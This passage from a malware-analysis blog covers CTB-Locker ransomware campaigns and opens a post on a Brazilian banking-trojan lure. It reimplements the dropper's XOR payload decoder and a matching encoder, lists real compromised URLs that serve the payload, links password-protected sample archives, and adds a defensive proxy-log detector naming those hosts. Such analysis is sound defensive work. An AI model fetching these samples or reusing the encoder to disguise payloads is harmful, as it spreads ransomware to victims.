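          plain[i] == enc[i] ^ enc[i - 16] for i >= 16.
    """
    key = bytearray(key)          # the routine mutates its key on the stack
    out = bytearray(len(encoded))
    k = 0                         # EDI: index into the key
    for i, c in enumerate(encoded):   # EBX: index into the buffer
        out[i] = c ^ key[k]       # XOR CL,AL  -> decoded byte
        key[k] = c                # XOR AL,CL ; MOV [EDX],AL -> encoded byte becomes key
        k += 1                    # INC EDI
        if k == len(key):         # CMP EDI,10 / JNZ / XOR EDI,EDI
            k = 0
    return bytes(out)


def encode_payload(plain: bytes, key: bytes = INITIAL_KEY) -> bytes:
    """Inverse transform (constructed here only to build test data for the decoder)."""
    key = bytearray(key)
    out = bytearray(len(plain))
    k = 0
    for i, p in enumerate(plain):
        c = p ^ key[k]
        out[i] = c
        key[k] = c                # the *encoded* byte feeds the key, same as in decode
        k += 1
        if k == len(key):
            k = 0
    return bytes(out)


def looks_like_pe(data: bytes) -> bool:
    """Sanity check for the decoded output: MZ header and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Constructed fake PE header (not a real sample): DOS header with e_lfanew = 0x40.
_hdr = bytearray(b"MZ" + b"\x00" * 62)
_hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
FAKE_PE = bytes(_hdr) + b"PE\x00\x00" + b"\x00" * 20


def decode_file(src: str, dst: str) -> bool:
    """Decode a captured pack.tar.gz and report whether the result is a PE."""
    with open(src, "rb") as f:
        decoded = decode_payload(f.read())
    with open(dst, "wb") as f:
        f.write(decoded)
    return looks_like_pe(decoded)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: decode_ctb_downloader.py <pack.tar.gz> <out.exe>")
    print("PE header found" if decode_file(sys.argv[1], sys.argv[2]) else "not a PE")
```

<span style="font-family: Arial, Helvetica, sans-serif;">Running the script on the file fetched from one of the listed URLs should produce an MZ/PE image, which is the quickest check that the key was transcribed correctly; if the first two decoded bytes are not "MZ", the key or the wrap length is wrong.</span>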
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_QNSoFtrC4Ctm7K9CGEs55TGzSYeGYvklQS4HTORGr7gnzzrVtOliQZKbFw_Nmj52JwCOdyQUVxaMo6xvBirCy3PzVwOwcdDUiC6HcPeeOeXN4tDvKkhn2ijCgyCuZOs-RfrB-z5BQY0/s1600/05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_QNSoFtrC4Ctm7K9CGEs55TGzSYeGYvklQS4HTORGr7gnzzrVtOliQZKbFw_Nmj52JwCOdyQUVxaMo6xvBirCy3PzVwOwcdDUiC6HcPeeOeXN4tDvKkhn2ijCgyCuZOs-RfrB-z5BQY0/s1600/05.png" height="438" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">We let the routine run a little longer...</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKdFUglXQgEB7AiJ_DHVrbG1xdheYx3LvNWNQ4aBsjKjbRdLa6O_u19BxB0L9GR9hmJtruW9Ox70C1hm4uHYSbuhD1N5WUanZNv9Uqs4u_Hj9OyNkBiLFXQYqGd3b91gXSEKnsXxgA8zg/s1600/07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKdFUglXQgEB7AiJ_DHVrbG1xdheYx3LvNWNQ4aBsjKjbRdLa6O_u19BxB0L9GR9hmJtruW9Ox70C1hm4uHYSbuhD1N5WUanZNv9Uqs4u_Hj9OyNkBiLFXQYqGd3b91gXSEKnsXxgA8zg/s1600/07.png" height="430" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The executable is written to C:\Windows\Temp</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioo3rE2tPUgV87_g_8PMjuED0Zt_PpVIPAzc3PY4wJa-idgKKfKzMiGeKtBIWJZeLjv-fT_aSoFlaxUcohVp6Adx_N1222_QjQb9cvjk943LugEFzUDqhsnmQNuyZdtHGRPFwLrRj4dPY/s1600/08-b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioo3rE2tPUgV87_g_8PMjuED0Zt_PpVIPAzc3PY4wJa-idgKKfKzMiGeKtBIWJZeLjv-fT_aSoFlaxUcohVp6Adx_N1222_QjQb9cvjk943LugEFzUDqhsnmQNuyZdtHGRPFwLrRj4dPY/s1600/08-b.png" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">And then executed.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgieJy4-GKfyKaZMF0G4Dr0jlDU1oplRSclmYToAGTg18otdOMXO4KQUmLFiBxxQIawDVeyzfR1zOurkWx9y2n-3VwsOl2FTOxV97ZsbWMvxbvLTbOAd1xJmrgP2Rc_gVAz4kuBTmEUFzc/s1600/09-b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgieJy4-GKfyKaZMF0G4Dr0jlDU1oplRSclmYToAGTg18otdOMXO4KQUmLFiBxxQIawDVeyzfR1zOurkWx9y2n-3VwsOl2FTOxV97ZsbWMvxbvLTbOAd1xJmrgP2Rc_gVAz4kuBTmEUFzc/s1600/09-b.png" height="124" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">CTB-Locker's message once it has run and encrypted the victim's files.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQBReZNhzZWG5x6qN_ETx4myMlSCP3_Tm9tpkRgISP6UKwcYhj75SiASLDqXMNyAXAyFxfidtwWYgrGJdr1yFqnsZlqfoFmOCykajDVu61YLDg5gpgXTJ42uh5fO61iJjxeEwkMPha01s/s1600/02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQBReZNhzZWG5x6qN_ETx4myMlSCP3_Tm9tpkRgISP6UKwcYhj75SiASLDqXMNyAXAyFxfidtwWYgrGJdr1yFqnsZlqfoFmOCykajDVu61YLDg5gpgXTJ42uh5fO61iJjxeEwkMPha01s/s1600/02.png" height="480" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Samples with dumps: https://www.dropbox.com/s/2mhund40f6hqula/ctb-locker-21-01-15.rar?dl=0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Password = infected</span><br />
<br />
<br />
<br />
<br />
<br />
<b>28/01/2015 - <span style="font-family: Arial, Helvetica, sans-serif;">New campaign</span></b><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<span style="font-family: Arial, Helvetica, sans-serif;">New emails, written in Spanish, were sent from compromised accounts.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwK51fLhOzE5Vp14LWRirmXjYjL6xmb5PKERX-WvQIhmBZoK8bfTBI_WI5I4HTmrfo61F4BvufuUIjO97G_wPWaRZON7tGn8ena-I5-G8_gwXtZ1UmBnQgxitKyMQOTx_1_rRbSfk3cA/s1600/Clipboard02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwK51fLhOzE5Vp14LWRirmXjYjL6xmb5PKERX-WvQIhmBZoK8bfTBI_WI5I4HTmrfo61F4BvufuUIjO97G_wPWaRZON7tGn8ena-I5-G8_gwXtZ1UmBnQgxitKyMQOTx_1_rRbSfk3cA/s1600/Clipboard02.jpg" height="210" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">CAB attachment containing an .SCR executable</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Y9TJ2y5Gr19HYKNCUlzHns-JhSZxAEs-KRUNM12cLTTJ5vH_AGQdx1OQOnIzEqWGS2uMZDhhEhWWgrTLKio26JbybcWOiLOIbr1gGtmQfnytS_4BD2u7AFPzFcirWZnqUjap1LO3V1I/s1600/Clipboard01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Y9TJ2y5Gr19HYKNCUlzHns-JhSZxAEs-KRUNM12cLTTJ5vH_AGQdx1OQOnIzEqWGS2uMZDhhEhWWgrTLKio26JbybcWOiLOIbr1gGtmQfnytS_4BD2u7AFPzFcirWZnqUjap1LO3V1I/s1600/Clipboard01.jpg" height="267" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">VirusTotal analysis, with an almost nil detection rate: 2/57</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBpyFflHZTdxd4r7vXocqSfL9NSXNpQWMPKT7s4Kcz-72ye5Om_rIp3F-6-b6kJ6N7l1rGeeoW9U-P4NJQiaPLOqNGIdrgAM-wUONZoPYvpkG9_XDHWWjVCTWPdbSDBe_YfjTsJrWXz0/s1600/vt01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBpyFflHZTdxd4r7vXocqSfL9NSXNpQWMPKT7s4Kcz-72ye5Om_rIp3F-6-b6kJ6N7l1rGeeoW9U-P4NJQiaPLOqNGIdrgAM-wUONZoPYvpkG9_XDHWWjVCTWPdbSDBe_YfjTsJrWXz0/s1600/vt01.jpg" height="110" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Sites from which the dropper downloads CTB-Locker (HTTPS)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014D6 MOV DWORD PTR SS:[EBP-40],Dumped.0040106 UNICODE "joefel.com/easyscripts/sancho.tar.gz"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014DD MOV DWORD PTR SS:[EBP-38],Dumped.004010B UNICODE "m-a-metare.fr/media/sancho.tar.gz"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014E4 MOV DWORD PTR SS:[EBP-30],Dumped.004010F UNICODE "ourtrainingacademy.com/LeadingRE/sancho.tar.gz"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014EB MOV DWORD PTR SS:[EBP-28],Dumped.0040115 UNICODE "locamat-antilles.com/memo/sancho.tar.gz"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014F2 MOV DWORD PTR SS:[EBP-20],Dumped.004011A UNICODE "thomasottogalli.com/webtest/sancho.tar.gz"</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014F9 MOV DWORD PTR SS:[EBP-18],Dumped.0040120 UNICODE "cds-chartreuse.fr/locales/sancho.tar.gz"</span><br />
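<span style="font-family: Arial, Helvetica, sans-serif;">Both URL lists in this post (the pack.tar.gz set from the 21-01-15 dump and the sancho.tar.gz set above) and the observed behaviour (a touch of windowsupdate.microsoft.com as a connectivity check, then a .tar.gz fetch from a compromised site with the MSIE 7.0 User-Agent) give a defender three things to look for in proxy logs. The script below is an added example, not part of the post or the author's tooling: the hosts and User-Agent are taken from the listings on this page, while the log line format and the sample lines are constructed. Because the real download goes over HTTPS, a proxy will usually only see the host in a CONNECT request, so the host match is the strongest signal; the User-Agent alone would also match a genuine old IE7 on Vista and is only useful in combination with the other two.</span>

```python
"""Flag proxy-log clients showing the CTB-Locker downloader pattern.

Added example; not the blog author's code.  Hosts and User-Agent come from the
dumps quoted in the post; the log format below is constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Download URLs quoted in the post (21-01-15 and 28-01-15 campaigns).
PAYLOAD_URLS = {
    "voigt-its.de/fit/pack.tar.gz",
    "maisondessources.com/assets/pack.tar.gz",
    "jbmsystem.fr/jb/pack.tar.gz",
    "pleiade.asso.fr/piwigotest/pack.tar.gz",
    "scolapedia.org/histoiredesarts/pack.tar.gz",
    "joefel.com/easyscripts/sancho.tar.gz",
    "m-a-metare.fr/media/sancho.tar.gz",
    "ourtrainingacademy.com/LeadingRE/sancho.tar.gz",
    "locamat-antilles.com/memo/sancho.tar.gz",
    "thomasottogalli.com/webtest/sancho.tar.gz",
    "cds-chartreuse.fr/locales/sancho.tar.gz",
}
PAYLOAD_HOSTS = {u.split("/", 1)[0] for u in PAYLOAD_URLS}
DOWNLOADER_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
CONNECTIVITY_HOST = "windowsupdate.microsoft.com"

# Constructed log format: <iso-timestamp> <client> <method> <host[:port]> <path> "<user-agent>"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, host, path, ua = m.groups()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"),
        "client": client,
        "method": method,
        "host": host.split(":")[0],   # CONNECT lines carry host:443
        "path": path,
        "ua": ua,
    }


def flag_clients(lines, window=timedelta(seconds=120)):
    """Return {client: set(reasons)} for clients matching any of the three signals."""
    reasons = defaultdict(set)
    last_check = {}   # client -> time of its last windowsupdate.microsoft.com contact
    for rec in filter(None, map(parse_line, lines)):
        c = rec["client"]
        if rec["host"] in PAYLOAD_HOSTS:
            reasons[c].add("known-payload-host")
        if rec["ua"] == DOWNLOADER_UA:
            reasons[c].add("downloader-user-agent")
        if rec["host"] == CONNECTIVITY_HOST:
            last_check[c] = rec["ts"]
        elif (rec["path"].endswith(".tar.gz") and c in last_check
              and rec["ts"] - last_check[c] <= window):
            reasons[c].add("connectivity-check-then-tar.gz")
    return dict(reasons)


# Constructed sample log: one infected client (10.0.0.5), two benign ones.
SAMPLE_LOG = """\
2015-01-21T10:00:01 10.0.0.5 GET windowsupdate.microsoft.com / "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
2015-01-21T10:00:03 10.0.0.5 CONNECT jbmsystem.fr:443 - "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
2015-01-21T10:00:04 10.0.0.5 GET jbmsystem.fr /jb/pack.tar.gz "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
2015-01-21T10:05:00 10.0.0.7 GET windowsupdate.microsoft.com / "Windows-Update-Agent"
2015-01-21T10:06:00 10.0.0.7 GET www.example.com /index.html "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0"
2015-01-21T10:10:00 10.0.0.9 GET windowsupdate.microsoft.com / "Windows-Update-Agent"
2015-01-21T10:20:00 10.0.0.9 GET mirror.example.net /pub/tool-1.0.tar.gz "curl/7.38.0"
"""

if __name__ == "__main__":
    for client, why in sorted(flag_clients(SAMPLE_LOG.splitlines()).items()):
        print(client, ", ".join(sorted(why)))
```

<span style="font-family: Arial, Helvetica, sans-serif;">In the constructed sample only 10.0.0.5 is flagged: 10.0.0.9 also fetches a .tar.gz after touching Windows Update, but ten minutes later and from a host that is not on the list, so the sequence rule does not fire. The 120-second window is an assumption; tune it to how quickly the downloader moves from its connectivity check to the real download in your own captures.</span>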
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrTIqYMGwoss6d3MZx91ziF-Xsecla5I1lESf-l0ZNVxw8gPSTYQTCkamBVh2zVkHAxWoj3YVto1jRiucsFcAz-LGAWTd8k6wvn8q1E-3kfRdMw_nPTiOyat2on_ei65KrUIbiHpdVX-k/s1600/Captura+de+pantalla+de+2015-01-28+10_07_43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrTIqYMGwoss6d3MZx91ziF-Xsecla5I1lESf-l0ZNVxw8gPSTYQTCkamBVh2zVkHAxWoj3YVto1jRiucsFcAz-LGAWTd8k6wvn8q1E-3kfRdMw_nPTiOyat2on_ei65KrUIbiHpdVX-k/s1600/Captura+de+pantalla+de+2015-01-28+10_07_43.png" height="124" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">VirusTotal analysis of the payload (CTB-Locker)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM37GdXuqrrH1k-m0aQoQ2bbhurSPUtBmbpRS4ZF0fK0PCmxvIFLafc917GdUKQ98b-j3QYwdogGMS0vg8MhglHWMNiD9bxeRyfhE_IJsk5ARND8_0Uf7U79L7RaUgfPIKsMEp-7HE258/s1600/vt02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM37GdXuqrrH1k-m0aQoQ2bbhurSPUtBmbpRS4ZF0fK0PCmxvIFLafc917GdUKQ98b-j3QYwdogGMS0vg8MhglHWMNiD9bxeRyfhE_IJsk5ARND8_0Uf7U79L7RaUgfPIKsMEp-7HE258/s1600/vt02.jpg" height="81" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<table class="table table-striped" id="antivirus-results" style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; max-width: 100%; width: 940px;"><thead>
<tr style="border: 0px;"><th class="header headerSortDown vt-width-30" style="border-bottom-color: rgb(221, 221, 221); border-bottom-style: solid; border-bottom-width: 1px; border-top-width: 0px; padding: 8px; vertical-align: bottom; width: 300px;">Antivirus</th><th class="header" id="results-header" style="border-bottom-color: rgb(221, 221, 221); border-bottom-style: solid; border-bottom-width: 1px; border-top-width: 0px; cursor: pointer; padding: 8px; vertical-align: bottom;">Result</th><th class="header" style="border-bottom-color: rgb(221, 221, 221); border-bottom-style: solid; border-bottom-width: 1px; border-top-width: 0px; padding: 8px; vertical-align: bottom;">Update</th></tr>
</thead><tbody>
<tr style="border: 0px;"><td class="ltr" style="background-color: #f9f9f9; border: 0px; direction: ltr !important; padding: 8px; vertical-align: top;">McAfee-GW-Edition</td><td class="ltr text-red" style="background-color: #f9f9f9; border: 0px; color: rgb(180, 12, 26) !important; direction: ltr !important; padding: 8px; vertical-align: top;">BehavesLike.Win32.Backdoor.bc</td><td class="ltr" style="background-color: #f9f9f9; border: 0px; direction: ltr !important; padding: 8px; vertical-align: top;">20150128</td></tr>
<tr style="border: 0px;"><td class="ltr" style="border: 0px; direction: ltr !important; padding: 8px; vertical-align: top;">Qihoo-360</td><td class="ltr text-red" style="border: 0px; color: rgb(180, 12, 26) !important; direction: ltr !important; padding: 8px; vertical-align: top;">HEUR/QVM20.1.Malware.Gen</td><td class="ltr" style="border: 0px; direction: ltr !important; padding: 8px; vertical-align: top;">20150128</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The ransomware's message demanding a ransom for the encrypted files.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFfj3U7Cv6gymnCqNkg3kPvWievAYF8hIHZO9IO3YbuZEFcO_ZIxmMuk-1KPQveVteJFIKuUtz1NDwjSqAiSdPO4PzzmKelZV7wTvU1DVqhPcqxaOUCEXzMJJl83vjOdbcZXcdysKhg-M/s1600/Captura+de+pantalla+de+2015-01-28+10_30_54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFfj3U7Cv6gymnCqNkg3kPvWievAYF8hIHZO9IO3YbuZEFcO_ZIxmMuk-1KPQveVteJFIKuUtz1NDwjSqAiSdPO4PzzmKelZV7wTvU1DVqhPcqxaOUCEXzMJJl83vjOdbcZXcdysKhg-M/s1600/Captura+de+pantalla+de+2015-01-28+10_30_54.png" height="229" width="320" /></a></div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Payment request of 2.5 BTC (approximately US$625) to decrypt the "hijacked" files.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR_v7FOHlvRH7onscM1LfF-7n5h94pDvxzhb7jb2WpYDTodlzGMm5elPEygA1raFa84nZpz4MuQyNfX568q235jRLrjN_FF8WWoH_Z7e5kB5plCWYm2aKaVcxn0NdFQzPi3QYawz6_qxg/s1600/Captura+de+pantalla+de+2015-01-29+12_34_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR_v7FOHlvRH7onscM1LfF-7n5h94pDvxzhb7jb2WpYDTodlzGMm5elPEygA1raFa84nZpz4MuQyNfX568q235jRLrjN_FF8WWoH_Z7e5kB5plCWYm2aKaVcxn0NdFQzPi3QYawz6_qxg/s1600/Captura+de+pantalla+de+2015-01-29+12_34_14.png" height="236" width="320" /></a></div>
<br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Samples: https://www.dropbox.com/s/dk9eyjpt04y4k3r/CTB-Loker%2028-01-15.zip?dl=0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Password = infected</span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">That's all for now.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com1tag:blogger.com,1999:blog-4220472203730425546.post-20166026623923743042014-11-27T08:01:00.002-08:002014-11-27T08:01:53.915-08:00<span style="background-color: #fefdfa;"><b><span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2000007629395px;">Fake Summons:</span><span style="line-height: 18.2000007629395px;"> </span></span></b></span><span style="color: #444444; font-family: 'Segoe UI Light', 'Segoe UI Web Light', 'Segoe UI Web Regular', 'Segoe UI', 'Segoe UI Symbol', HelveticaNeue-Light, 'Helvetica Neue', Arial, sans-serif; line-height: 29.9904003143311px;">Intimacao de n. 9743872. O MINISTERIO PUBLICO FEDERAL</span><br />
<span style="background-color: #fefdfa; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2000007629395px;"><b><br /></b></span><span style="background-color: #fefdfa;"><span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2000007629395px;">Today I bring you a threat that targets several Brazilian banks. Through social engineering it lures unsuspecting users into downloading a supposed summons from Brazil's Federal Public Ministry. </span></span></span><br style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2000007629395px;" /><br />
<h2 class="rmSubject" style="background-color: #fefdfa; border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 1px; color: #444444; font-family: 'Segoe UI Light', 'Segoe UI Web Light', 'Segoe UI Web Regular', 'Segoe UI', 'Segoe UI Symbol', HelveticaNeue-Light, 'Helvetica Neue', Arial, sans-serif; font-size: 21px; font-stretch: normal; font-weight: normal; line-height: 29.9904003143311px; margin: 0px 0px 13px; padding: 2px 0px 0.5em; position: relative; text-align: center;">
<strong style="background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal; text-align: start;">PROCEDIMENTO INVESTIGATÓRIO N.º 33781M. </strong></h2>
<div>
<strong style="background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal; text-align: start;"><br /></strong></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUFD9mK9tZzMQCcyiAjX4Pg0YIoFya7KREwU_XM4pEsPeK12KYE4pkfCRw5xrgWgF48yP8wDJjVdXas9uAk6qihmypmzvEu3vguepgBjm9VrZYb3Ki0xMHMBxKFNStC04SWeAyxe9WdDM/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUFD9mK9tZzMQCcyiAjX4Pg0YIoFya7KREwU_XM4pEsPeK12KYE4pkfCRw5xrgWgF48yP8wDJjVdXas9uAk6qihmypmzvEu3vguepgBjm9VrZYb3Ki0xMHMBxKFNStC04SWeAyxe9WdDM/s1600/01.jpg" height="400" width="370" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The link downloads a ZIP that contains a CPL file.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hxxp:// ecole.saintlumine.free.fr/ecolesaintlu/images/Federal. php</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hxxp:// w477408.blob4.ge.tt/streams/73TicN52/Intimacao-Federal. zip</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
